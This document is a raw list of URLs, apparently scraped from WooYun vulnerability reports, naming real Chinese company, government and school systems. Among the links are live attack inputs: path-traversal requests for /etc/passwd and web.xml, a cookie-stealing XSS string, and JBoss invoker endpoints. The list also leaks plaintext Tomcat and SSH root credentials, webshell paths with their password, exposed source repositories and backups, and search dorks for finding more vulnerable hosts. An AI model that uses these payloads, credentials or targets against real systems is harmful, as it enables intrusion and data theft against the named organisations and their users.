http://supplier.ext.jumei.com/index.php?r=Bills/purchaseOrder/IntoPacking&id=JPO031503240115 http://supplier.ext.jumei.com/index.php?r=Bills/purchaseOrder/print&id=JPO081503250081 http://www.600795.com.cn/gddltp/login.do index.php/bbs/threadlist/addmarked/ http://ucstar.jxlife.com.cn:9090/webcall/messageNoteAdd.jsp http://o2o.yummy77.com/warehouse/security/login http://oiio.yummy77.com:8090/storesB2C/login.shtml http://oiio.yummy77.com:8070/depotManage/login.shtml http://mail.gjqh.com.cn:9090/webcall/messageNoteAdd.jsp http://im.gjzq.cn:9090/webcall/messageNoteAdd.jsp http://im.gjzq.cn:9090/webcall/messageNoteAdd.jsp http://3g.jstv.com:80/hd/2014_FCWR/Do.aspx?action=GetJMDB&date=2015-1-1 http://www.wooyun.org/bugs/wooyun-2015-0119785/trace/7e869bd972ded71406d3c1989d509e53 http://www.wooyun.org/bugs/wooyun-2015-0119735/trace/689ce3e2c7781f31d56f7218252e7ae3 inurl:allnewsnr.asp?bianhao= http://220.178.213.189/web/web/web/searched.asp http://www.gzjwch.com/web/web/web/searched.asp http://125.67.64.236:6611/web/web/web/searched.asp http://182.151.215.126/web/web/web/searched.asp http://www.gzysx.com/sx/web/web/web/searched.asp 
http://www.gxevc.com:10333/web/web/web/searched.asp http://218.89.109.22/web/web/web/searched.asp http://supply.vivo.com.cn/examples/servlets/servlet/SessionExample;jsessionid=C44A64DEDD77CF24847E5919542A2DCE http://pop.vivo.com.cn/examples/servlets/servlet/SessionExample pop.vivo.com.cn/loginOn.action http://61.163.101.182:82/ http://218.16.97.170/ ftp://202.119.108.8/Weiyun/SysTech-2015/ ftp://202.119.108.8/Weiyun/SysTech-2015/虚拟机管理平台.docx ftp://202.119.108.8/Weiyun/SysTech-2015/服务器列表.doc www.swufe.edu.cn http://m.anoah.com/app/ladder/?c=learn&a=learnladder&clid=17&sgroup=B&pos=1 DBMS:MSQL http://www.touna.cn/web.tar.gz http://lecms.ott.letv.com/ http://119.90.56.205:8080/solr/ http://3g.inspur.com/ http://3g.inspur.com/manager/html www.chinahr.com http://180.166.208.140/Default.asp http://119.254.9.115/user.php http://119.254.9.115/2.php http://weirenwu.weibo.com/ http://mobile.inspur.com/web.rar http://remotebak.abchinalife.cn:7060/ui http://remotebak.abchinalife.cn:7060/ui/common/cvar/CExec.jsp http://m.xianguo.com/homeindex/list?cid=1&tagid=7_31 http://101.227.246.116/main!index.html http://101.227.246.116/main.html http://oa.chinatelecom-ec.com/ x.kuwo.cn/KuwoLive/getActivityRankServlet?count=10&r=0.4750313104595989&topReceId=291&topSendId=292 http://ishoway.com/flow.php?step=update_cart http://linjia.me/sharehongbao2?code=041fff862df835ff8bb9bf748e8d980U&state=382400 http://ktvpj.evideostb.com/Login.aspx http://61.133.202.178:8080/user!login.action http://61.133.202.178:8080/qwe.jsp http://epos.tianan-life.com/console/login/LoginForm.jsp http://www.wooyun.org/bugs/wooyun-2015-0119735/trace/689ce3e2c7781f31d56f7218252e7ae3 http://chzx.mhedu.sh.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://58.217.106.249/bl/groupSpace/group/group_banner.jsp?groupId= http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://zjyiz.zje.net.cn/bl/groupSpace/group/group_banner.jsp?groupId= 
http://www.hsjy.pte.sh.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://www.zjyk2z.net/bl/groupSpace/group/group_banner.jsp?groupId= http://www.yk2z.ykedu.net/bl/groupSpace/group/group_banner.jsp?groupId= http://chzx.mhedu.sh.cn/bl/groupSpace/group/welcome.jsp?groupId= http://58.217.106.249/bl/groupSpace/group/welcome.jsp?groupId= http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/welcome.jsp?groupId= http://zjyiz.zje.net.cn/bl/groupSpace/group/welcome.jsp?groupId= http://www.hsjy.pte.sh.cn/bl/groupSpace/group/welcome.jsp?groupId= http://www.zjyk2z.net/bl/groupSpace/group/welcome.jsp?groupId= http://www.yk2z.ykedu.net/bl/groupSpace/group/welcome.jsp?groupId= http://chzx.mhedu.sh.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://58.217.106.249/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://zjyiz.zje.net.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.hsjy.pte.sh.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.zjyk2z.net/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.yk2z.ykedu.net/bl/groupSpace/group/createGroup2.jsp?groupId= http://chzx.mhedu.sh.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://58.217.106.249/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.hszhj.pudong-edu.sh.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://zjyiz.zje.net.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.hsjy.pte.sh.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.zjyk2z.net/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.yk2z.ykedu.net/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://chzx.mhedu.sh.cn/be/berinfo/ber_info.jsp?berId=1271661083479 http://www.hshsh.pudong-edu.sh.cn/be/berinfo/ber_info.jsp?berId=1416984224216 http://218.78.245.222/be/berinfo/ber_info.jsp?berId=1329363377864 http://bhxx.jdedu.net/be/berinfo/ber_info.jsp?berId=1434421662489 
http://czgj.hkedu.sh.cn/be/berinfo/ber_info.jsp?berId=1318560235786 http://chzx.mhedu.sh.cn/be/sys_bonus.jsp?regionFile=sh&key= http://www.hshsh.pudong-edu.sh.cn/be/sys_bonus.jsp?regionFile=sh&key= http://218.78.245.222/be/sys_bonus.jsp?regionFile=sh&key= http://bhxx.jdedu.net/be/sys_bonus.jsp?regionFile=sh&key= http://czgj.hkedu.sh.cn/be/sys_bonus.jsp?regionFile=sh&key= http://chzx.mhedu.sh.cn/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://www.hshsh.pudong-edu.sh.cn/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://218.78.245.222/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://bhxx.jdedu.net/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://czgj.hkedu.sh.cn/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://chzx.mhedu.sh.cn/be/ber_list.jsp?regionFile=sh&subjectId= http://www.hshsh.pudong-edu.sh.cn/be/ber_list.jsp?regionFile=sh&subjectId= http://218.78.245.222/be/ber_list.jsp?regionFile=sh&subjectId= http://bhxx.jdedu.net/be/ber_list.jsp?regionFile=sh&subjectId= http://czgj.hkedu.sh.cn/be/ber_list.jsp?regionFile=sh&subjectId= http://chzx.mhedu.sh.cn/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://www.hshsh.pudong-edu.sh.cn/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://218.78.245.222/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://bhxx.jdedu.net/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://czgj.hkedu.sh.cn/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://chzx.mhedu.sh.cn/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://www.hshsh.pudong-edu.sh.cn/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 
http://218.78.245.222/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://bhxx.jdedu.net/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://czgj.hkedu.sh.cn/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://bbs.zol.com.cn/sjbbs/d34130_132840.html http://psc.inspur.com/.svn/entries http://psc.inspur.com/ http://59.175.218.82/FQMS/login.jsp http://119.233.254.26/default.aspx http://union.lashou.com/ http://helpadmin.cnsuning.com/hc-admin-web/messageBoard/input.htm?id=1260 http://www.ptpress.cn//NewBooks.aspx?teach=j&fid=1,2%A3%AC3,4,5,6,7,8,9,11,15,16,17,99 https://github.com/***/doc x.kuwo.cn/KuwoLive/DynamicInfo http://sxedjf.bankcomm.com:80/gaoxiao/index/payf/id/4。隐隐地感觉可能存在伪静态注入,然后直接上sqlmap跑一下。 http://opda.com:808/admin/ http://dgdz.xzit.edu.cn/model/TwoGradePage/rulemanage.aspx?columnId=261 http://hzhlab.hytc.edu.cn/model/TwoGradePage/rulemanage.aspx?columnId=261 http://182.129.150.10:8001//model/TwoGradePage/rulemanage.aspx?columnId=261 http://sys.zafu.edu.cn:81/model/TwoGradePage/rulemanage.aspx?columnId=261 http://labch.cumt.edu.cn:81/model/TwoGradePage/rulemanage.aspx?columnId=261 http://open.csdn.net/ http://116.52.249.96/sjpt/login.action http://116.52.249.231/sjpt/login.action http://116.52.249.51/sjpt/login.action http://www.vmovier.com/user/forgetpwd http://www.vmovier.com/user/resetpwd?email=**@**.***&token=f321cd2871eac182554f78ab6b3bb9c3 inurl:qsksyy http://www.lcwscgs.com/qsksyy/ http://123.130.246.26:9080/qsksyy/ http://60.211.179.22:9080/qsksyy/ http://www.wfcgs.com:9080/qsksyy/ http://cgs.ytjj.gov.cn:9061/qsksyy/ http://www.dygajj.gov.cn:9080/qsksyy/ http://58.59.39.43:9080/qsksyy/ http://218.59.228.162/ http://221.2.145.164:9080 http://www.bzwscgs.com:9080 http://test.chunshuitang.com/ http://test.chunshuitang.com/ http://test.chunshuitang.com/.svn/entries http://en.zqgame.com/test.zip 
http://wan.160.com/wan.160.com.zip http://op.wepiao.com http://www.yingcankeji.com/news?typeid=2 http://im.suning.com/ http://qa.suning.com http://qa.suning.com/server-status http://qa.suning.com/qa-web/index.htm http://cargo.yzr.com.cn:80/ http://www.7958.com.cn/user/getpwd http://gsv.muzhiwan.com:80/ http://down.jumbotcms.net/www.rar http://help.jumbotcms.net/www.rar http://news.jumbotcms.net/www.rar http://service.jumbotcms.net/www.rar http://video.jumbotcms.net/www.rar http://www.jumbotcms.net/www.rar http://www.jlssljsxx.com/Zhaobiao/News_detail.asp?News_ID=4753&News_BigClass_ID=2 http://wechat3.cc.letv.com/EliteWebChat/jsp/letv/new/.svn/ http://tripshow.com/listing/places/?cid=14219 http://tripshow.com/listing/places/?cid=14219 http://tripshow.com/listing/hotels/?cid=14228 http://tripshow.com/listing/attractions/?cid=14216 http://www.cnfinance.cn/ http://cabf.cnfinance.cn/searchbook.php?class= http://cabf.cnfinance.cn/searchpx.php?class= http://www.cnfinance.cn/forum/forum_view.php?filter=is_jh&fid=10 http://www.cnfinance.cn/forum/forum_view.php?orderby=last_post_date&fid=10 http://cabf.cnfinance.cn/skin/default/images/shousuo.jpg/.php http://www.cnfinance.cn/forum/templates/default/images/logo.png/.php http://banner.chinesegamer.net/gamebn/abm.aspx?z=71 http://wk10.netentsec.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.netentsec.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.netentsec.com/en/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://service.netentsec.com/uc_server/control/admin/db.php 
http://dtt.chinahr.com/H/login.asp http://www.51zhangdan.com/share/invite/admin.html https://www.u51.com/service/log4net.xml http://www.homelinkhr.com/view_initIndexPageForCustomer.action http://old.med.wanfangdata.com.cn/Trace.axd inurl:queryProvidentFund.action http://app.mybj.gov.cn/BusinessServer/providentfund/ProvidentFundAction/queryProvidentFund.action?mobile=&pt=&token=&ua=&nodeId=&yzfs=2&cardId=EEDFFLEMCLDGEFELFEDD&cardPassword=ELFEDD&buttonName=%E6%9F%A5%E8%AF%A2&encryp=true http://app.mybj.gov.cn/BusinessServer/providentfund/ProvidentFundAction/queryProvidentFund.action?mobile=&pt=&token=&ua=&nodeId=&yzfs=2&cardId=EEDFFLEMCADCDLEAEEDD&cardPassword=EAEEDD&buttonName=%E6%9F%A5%E8%AF%A2&encryp=true http://www.rqbao.com http://wx.tuhu.cn/order/Info?type=sg&orderId=这里订单号 http://wx.tuhu.cn/order/Info?type=sg&orderId=TH00000003 http://wx.tuhu.cn/order/Info?type=sg&orderId=TH01818650 http://job.lmjx.net/resume.php?print=1&itemid=1092 http://bjsp.39yst.com/index.php?call=product.index&id=2273 content://com.sina.weibo.picListProvider/query_picinfo content://mms-sms/conversations/ content://telephony/apgroups/ content://com.lenovo.launcher.badge/lenovo_badges/ content://com.sina.weibo.picListProvider/query_status content://com.sina.weibo.userlog/pushinitlog/ content://com.sina.weibo.picListProvider/query_size content://com.sina.weibo.userlog/netlog content://com.android.contacts/ content://com.huawei.android.launcher.settings/badge/ content://com.sina.weibo.userlog/netlog/ content://com.android.contacts content://com.sina.weibo.blogProvider/ content://com.sina.weibo.userlog/pushinitlog content://com.sina.weibo.userlog/ content://com.sina.weibo.userlog content://com.android.launcher2.settings/favorites?notify=true/ content://com.sina.weibo.blogProvider/home/ content://com.android.launcher2.settings/favorites?notify=true content://com.sina.weibo.picListProvider/query_picinfo/ content://com.sina.push.pushprovider.1004/ content://com.sina.weibo.sdkProvider 
content://com.sina.weibo.picListProvider/query_status/ content://com.lenovo.launcher.badge/lenovo_badges content://com.sina.weibo.picListProvider/query_size/ content://com.sina.weibo.sdkProvider/ content://telephony/apgroups content://com.sina.weibo.blogProvider/home content://com.huawei.android.launcher.settings/badge content://com.sina.weibo.picListProvider/ content://sms/inbox/ content://downloads/public_downloads/ content://com.sina.weibo.picListProvider content://mms-sms/conversations content://com.sina.weibo.spProvider content://com.android.launcher.settings/favorites?notify=true content://sms content://com.sina.weibo.spProvider/ content://downloads/public_downloads content://com.android.launcher.settings/favorites?notify=true/ content://sms/ content://sms/inbox content://com.sina.weibo.blogProvider content://com.sina.push.pushprovider.1004 content://telephony/carriers content://telephony/carriers/preferapn/ content://telephony/carriers/ content://telephony/carriers/preferapn content://telephony/carriers content://telephony/carriers/preferapn/ content://telephony/carriers/ content://telephony/carriers/preferapn http://61.167.120.27/ http://42.121.1.195:8888/Manager/Account/Login.aspx http://dzw11.dgpt.edu.cn/Manager/Account/Login.aspx?ReturnUrl=~/Index.aspx http://work.csuft.edu.cn/Manager/Account/Login.aspx?ReturnUrl=/Index.aspx http://www.yichengpin.com http://m.yichengpin.com/admin/order/orderMgr-getOrderDetail.htm?orderHead.orderId=xxx ftp://122.114.56.217 http://www.gtamall.com/fare/farePolicy.html?method=inAllPolicyQuery&busikey=3YYNsU4AYnOcLN9GmcZkWw%3D%3D&busiid=4acbefbf6b5ee16ad93448052d6deb9459c778de https://112.126.76.199/moreDayDetail.htm?id=181 http://frsupport.msi.com http://app1.chinadaily.com.cn:80/survey/v.php?mmid=841 www.paixie.net content://mx.history/ content://com.tencent.mm.sdk.plugin.provider/sharedpref/ content://icc/adn content://com.mx.browser.downloadprovider/download/ content://com.mx.browser.downloadprovider/resetdb/ 
content://com.facebook.katana.provider.AttributionIdProvider/ content://com.android.launcher2.settings/favorites?notify=true/ content://com.mx.browser.commonprovider/ content://com.android.launcher2.settings/favorites?notify=true content://icc/adn/ content://suggestion.searchengine content://com.mx.browser.downloadprovider/download content://com.android.launcher.settings/favorites?notify=true/ content://com.mx.browser.downloadprovider/ content://com.mx.browser.downloadprovider/resetdb content://com.mx.browser.downloadprovider content://com.mx.browser.commonprovider content://com.facebook.katana.provider.AttributionIdProvider content://com.android.launcher.settings/favorites?notify=true content://suggestion.searchengine/ content://com.tencent.mm.sdk.plugin.provider/sharedpref content://mx.history content://com.mx.browser.browserprovider/ content://com.mx.browser.browserprovider content://com.mx.browser.browserprovider/bookmark content://com.mx.browser.browserprovider/bookmark/ content://com.mx.browser.browserprovider content://com.mx.browser.browserprovider/bookmark content://com.mx.browser.commonprovider/reader/ content://com.mx.browser.commonprovider/reader_item/ content://com.mx.browser.commonprovider/reader_item content://com.mx.browser.browserprovider/bookmark/ content://com.mx.browser.browserprovider/ content://com.mx.browser.commonprovider/reader content://com.mx.browser.browserprovider/bookmark/ http://www.hacker.com/ http://www.hacker.com/”,用户一旦不注意就会中招,造成钱财损失。 http://202.103.218.38/Login.aspx www.zdlife.net http://www.gx1996.com/system/login.jsp http://www.gx1996.com/system/borrowDetails.action?&id=1732 http://app1.chinadaily.com.cn:80/survey/vs.php?id=105&tp=0 http://www.baojia.com/about/contact/ http://open.baojia.com/account/resetpwd/ http://chaoshi.zdlife.net/ http://wutongyu.info/host.php http://lp.nia.net.cn/sg/sgAction.do?doaction=dsdetail&pid=502000 http://shenghuo.360.cn/mobile/ordertopay/OrderID/M15054305444825 http://mail.bjtu.edu.cn/这个网址 
http://www.zousifun.com/admin/cms/info_xpage.do?mkcode=8021&userip=10.4.153.231&usermac=10:40:F3:91:0D:D0 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm url:http://219.238.131.74:80/manager/html user:tomcat pass:tomcat http://42.159.132.82:8080/ http://www.udamall.com/cn/index.php/gallery-ajax_get_goods.html http://218.7.239.170:81/PKPMBS/portal/MsgList.aspx http://218.27.1.143/PKPMBS/portal/MsgList.aspx http://www.ccjdw.com/PKPMBS/portal/MsgList.aspx http://www.jljszj.gov.cn/PKPMBS/portal/MsgList.aspx http://www.thszjz.com/PKPMBS/portal/MsgList.aspx http://dvp.travelsky.com/manager/html/ www.molb-xk.com http://223.223.177.154/ http://g.efw.cn/ http://www.chinaispo.com.cn/reg/regsuccess?checknum=3fb7eef621cb10415984706057c51517 http://www.chinaispo.com.cn/reg/regsucces http://66.150.173.133:8080/pureweb/server/login.jsp http://66.150.173.133:8080 http://66.150.173.133:8080/pureweb/resmd/studybrowser http://61.191.199.11/index.php?a=index&albums_id=5&c=../../../../../../../../../../etc/passwd%00.jpg&s=paike inurl:ProArticleInfo.aspx?ID= http://218.108.102.39:8091/index.aspx http://web.hzctc.cn/index.aspx http://www.lajyzx.gov.cn/ http://ggzy.hzsc.gov.cn/Index.aspx http://www.hcggzy.com/ http://laspzx.linan.gov.cn:8080/ http://218.108.114.98/ http://218.108.102.39:8091/ http://115.236.6.65/ http://laspzx.linan.gov.cn:8080/ http://gdxt.hxlife.com/ui http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp http://shop.travelsky.com:8089/fckeditor/editor/filemanager/connectors/test.html http://www.moko.cc/profile/wechatdyy932976907.html URL:http://www.moko.cc/getpassword.html www.17g.com http://42.62.4.138/ http://cu.ruiyinxin.com/cspLoginAction.passwordRetrieve.c?&operType=2&merchId=ODg2MzcxMzU3MjIzMjY4&answer=MA==&newPassword=YWExMjM0NTY=&settleDate=MjAxNTA1MDI=&encry=true http://cu.ruiyinxin.com 
http://cu.ruiyinxin.com/cspLoginAction.passwordRetrieve.c?&operType=2&merchId=ODg2MzcxMzU3MjIzMjY4&answer=MA==&newPassword=YWExMjM0NTY=&settleDate=MjAxNTA1MDI=&encry=true http://cu.ruiyinxin.com/ http://www.chinahr.com/modules/jsperson/modify.php http://magicube.pconline.com.cn/lottery/result.jsp?eventId=61&success=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://magicube.pconline.com.cn/lottery/result.jsp?eventId=61&success=1&callback= com.suning.mobile.epa/com.suning.mobile.paysdk.ui.BankListActivity;end http://218.7.239.170:81//PKPMBS/Charts/addCharts.aspx http://218.27.1.143/PKPMBS/Charts/addCharts.aspx http://www.ccjdw.com/PKPMBS/Charts/addCharts.aspx http://www.jljszj.gov.cn/PKPMBS/Charts/addCharts.aspx http://www.thszjz.com///PKPMBS/Charts/addCharts.aspx http://www.hyjsjd.cn/PKPMBS/Charts/addCharts.aspx http://u.unikaixin.com/login.php http://u.unikaixin.com http://demo.shopxx.net/ ip:115.236.185.233 http://sl.cnsuning.com/stwebclient/index.jsp http://price.ziroom.com/ http://price.ziroom.com/?_p=../../../../../../../../../../etc/passwd%00.jpg http://epos.jxlife.com.cn/ter/indexlis.jsp http://epos.jxlife.com.cn/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://m.client.10010.com/mobileService/login.htm http://jasi12333.xicp.net:41474/jxquery/ http://www.ptsn.net.cn/product/qydetail.php3 http://www.ptsn.net.cn/product/qydetail.php3?companyname=福建省鸿宇通信设备有限公司 https://www.cathayholdings.com/insurance www.cathayholdings.com使用第一级URL来定位到不同的公司,insurance https://www.cathayholdings.com/insurance/assets/services/module/carfix/CarFix.asp http://116.90.83.207:8088/TrainingInforMS/login url:http://fzf.vastpay.cn/login.action http://edm.hysec.com:8089/.svn/entries http://edm.hysec.com:8089/login/login.action http://www.cqga.gov.cn//gajpublicinfo/frontui/ApplyFinish.aspx?intApplicationID=10688 http://www.cqga.gov.cn//gajpublicinfo/frontui/ApplyQuery.aspx http://202.109.244.105:8100/zfcgzjxx/jsp/index_out.jsp 
http://202.109.244.105:8100/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository https://vpn.just.edu.cn/dana/home/index.cgi https://vpn.just.edu.cn/Teacher/Admin/,DanaInfo=192.168.11.53+TeacherManager.aspx https://vpn.just.edu.cn/jasinda/newteacher/,DanaInfo=192.168.11.52+index.jsp https://www.itouzi.com http://ms.smartisan.com/system http://m.jinjianginns.com/ http://m.jinjianginns.com/user/forget?phone=&tip=&channel=HOTELVP_JJZX_WAP http://sms.jlcar.net:8090/user/loginAction,如图所示: http://booking.dpslpark.com/ http://booking.dpslpark.com/backend.php?method=order.show&startTime=1970-01-01&endTime=1970-01-01&parkId=0&status=255&page=1&editOrderId= http://www.zhuaxia.com/php_controller/myFeedController.php?action=channelInfo&chid=833&customerId=29034823&lastid=0&show_all_item=1&sourceid=0&stamp=0.09998915647156537&version=200812241245 http://www.zhuaxia.com/register_check.php?logId=165 http://222.221.5.77/ http://222.221.5.77 http://www.siming.gov.cn:8087/smhd/common/pre.as?_url=/WEB-INF/web.xml http://hjzx.xmtfj.gov.cn:8001/common/pre.as?_url=/WEB-INF/web.xml http://www.haicang.gov.cn:8086/hchd/common/pre.as?_url=/WEB-INF/web.xml http://cloud.xm.gov.cn:88/common/pre.as?_url=/WEB-INF/web.xml http://www.xmta.gov.cn:8090/tahdzx/common/pre.as?_url=/WEB-INF/web.xml http://wcm.xmlib.net:9090/tsg/common/pre.as?_url=/WEB-INF/web.xml http://www.xmrs.gov.cn:83/rsj/common/pre.as?_url=/WEB-INF/web.xml http://new.fjzzy.org:8070/zzxy/common/pre.as?_url=/WEB-INF/web.xml http://www.fjlylc.gov.cn:8081/lchd/common/pre.as?_url=/WEB-INF/web.xml http://www.xmgs.gov.cn:8089/xmgsj/common/pre.as?_url=/WEB-INF/web.xml http://www.xiangan.gov.cn:8082/xahd/common/pre.as?_url=/WEB-INF/web.xml http://www.jlxfdc.com:8308/login.aspx http://220.180.164.175/login.aspx http://www.lysfgj.com:81/login.aspx http://www.ahjsfdc.com:81/login.aspx http://www.ychfgj.com/ba/Login.aspx http://220.180.164.175/login.aspx http://218.75.147.77:83/login.aspx http://www.ychfgj.com/ba/Login.aspx 
http://www.jlxfdc.com:8308/login.aspx http://www.zyfcj.com:81/login.aspx http://117.141.124.166/login.aspx http://222.134.62.118/login.aspx http://www.ahjsfdc.com:81/login.aspx http://www.suyufc.gov.cn/login.aspx http://ba.snajfdc.com:8888/login2.aspx http://218.89.108.173:8080/login.aspx http://61.134.55.211:8080/login.aspx http://www.mcfcj.com:8080/login.aspx http://lsfcj.com/login.aspx http://www.longkoufg.com:81/login2.aspx http://longkoufg.com:81/login2.aspx http://www.cpfgw.com/login.aspx http://git.tongbanjie.com/ http://dev.igetui.com/login.htm http://182.151.197.205:18081/emp/selfOpenAccountAction!preAddQYFR.action?parentId=1037 http://182.151.197.205:18081/emp/bak.jsp密码chopper http://sales.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://sales.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/hosts http://www.elifepay.com.cn/ http://www.jiangxilvyou.com/line_order/detail/918 http://news.oppomobile.com/panel/ http://www.jl54.org/jlgqt/public/content.jsp?id=73126&classid=1220000000&mainid=1220000000 http://boke2.ku6.com http://zc.zt-express.com http://zc.zt-express.com/declare/Down/DownAdmin.aspx http://202.108.145.32 http://scm0.digitalchina.com/wiki/index.php?title=%E9%A6%96%E9%A1%B5 http://www.hzfc.gov.cn/subject/16jjf3/050906mingdan.htm http://webcall.airchina.com.cn:9090/upload/message/3.JSPX http://119.6.98.100:18081/emp/selfOpenAccountAction!preAddZRR.action,经检测,未被修复。 http://static.wooyun.org/wooyun/upload/201504/28225602693282c8067081aa6426a7beae3561c6.jpg http://static.wooyun.org/wooyun/upload/201504/282254292245cadfc9b3da2954c69f8da75c2c00.jpg http://116.255.255.250:8582/BZBEMP/selfOpenAccountAction!preAddZRR.action http://121.15.133.162:8083/emp/selfOpenAccountAction!preAddZRR.action http://hy.csrpme.com/selfOpenAccountAction!preAddZRR.action http://124.172.243.231:8016/BZBEMP/selfOpenAccountAction!preAddZRR.action http://user.tjmme.com:8582/emp/selfOpenAccountAction!preAddZRR.action 
http://183.56.166.53:8582/EMP/LoginAction!login.action www.jshqjt.com------------- ssh:222.184.82.126:2201 root:111111 http://szhxy.guet.edu.cn/qxgl/showimg.aspx?fn=../qxgl/web.config http://www.ytehome.com/ http://esales.baosteel.com/baosteel_csm/ce/tLfqmActionCas1.cas?orderNum=X5J0001711&userNum=000107&system=NS&saleNetwork=A&userNo=0000&userNum=000107 http://esales.baosteel.com/baosteel_csm/ce/tLfqmActionCas1.cas?orderNum=X5J0001718&userNum=000107&system=NS&saleNetwork=A&userNo=0000&userNum=000107 http://esales.baosteel.com/baosteel_online/clearLoginSession.jsp http://it.zt-express.com http://it.zt-express.com/Views/BaQiang/BaQiangWangDian.aspx http://w.189.cn/ http://w.189.cn/wd/main.do?author=WT16109 http://w.189.cn/wd/main.do?author=WT3813 http://w.189.cn/wd/main.do?author=WT10692 http://w.189.cn/的两个账号,弱口令000000,当时成功登陆了(现在密码已经失效),找到一个地方可以上传文件,没有限制,导致getshell。 http://w.189.cn/wd/main.do?author=WT16109 http://w.189.cn/upload/images/20150614_154235124.jsp http://w.189.cn/admin/upload/images/20150411_11352641.jsp http://218.83.246.48/ http://www.adcosystem.cn:81/zabbix http://mail.cztv.com http://119.6.68.126:8086/ http://cti.dkd.net.cn/ http://222.73.37.218:81/ http://211.152.38.173/ http://211.152.52.234:82/ http://116.247.83.22/ http://61.129.255.238/ https://wl.zt-express.com https://wl.zt-express.com/systeminfo/MianDan/MianDanList.aspx http://wooyun.org/bugs/wooyun-2010-0116229 http://i.auto.sohu.com/user/userinfo/toModifyUserInfo.at# http://saa.auto.sohu.com/upload/tmp/11682554/20150614172550.jpg http://my.tv.sohu.com/crossdomain.xml http://i.sohu.com/crossdomain.xml http://uc.tuanche.com/login/quit www.jfshare.com http://www.zugame.com/xsk/?gid=249 http://ydxuexi.cnsuning.com/clp/redirectLogin.htm http://analytics.goodbaby.com/.git/config http://124.164.240.217:8080/finance03/monitor/szgk_form0.jsp?village_dm=0106010 http://hcnl.gov.cn:8082/finance_hc/monitor/szgk_form0.jsp?village_dm=0106010 
http://221.180.22.229:8080/finance//monitor/szgk_form0.jsp?village_dm=0106010 http://218.11.132.158:8081/finance_hbcd//monitor/szgk_form0.jsp?village_dm=0106010 http://202.99.207.13:8082/finance39//monitor/szgk_form0.jsp?village_dm=0106010 http://218.56.132.248:8082/finance_lysyn//monitor/szgk_form0.jsp?village_dm=0106010 http://124.164.240.217:8080/finance03/monitor/szgk_form1.jsp?village_dm=0106010 http://106.74.112.41:8081/finance_nxyc//monitor/szgk_form1.jsp?village_dm=0106010 http://61.178.243.127:8081/finance_yc//monitor/szgk_form1.jsp?village_dm=0106010 http://218.87.99.80:8080/finance_jx05//monitor/szgk_form1.jsp?village_dm=0106010 http://221.180.22.229:8080/finance//monitor/szgk_form1.jsp?village_dm=0106010 http://124.164.240.217:8080/finance03/monitor/szgk_form2.jsp?village_dm=0106010 http://221.180.22.229:8080/finance//monitor/szgk_form2.jsp?village_dm=0106010 http://hcnl.gov.cn:8082/finance_hc//monitor/szgk_form2.jsp?village_dm=0106010 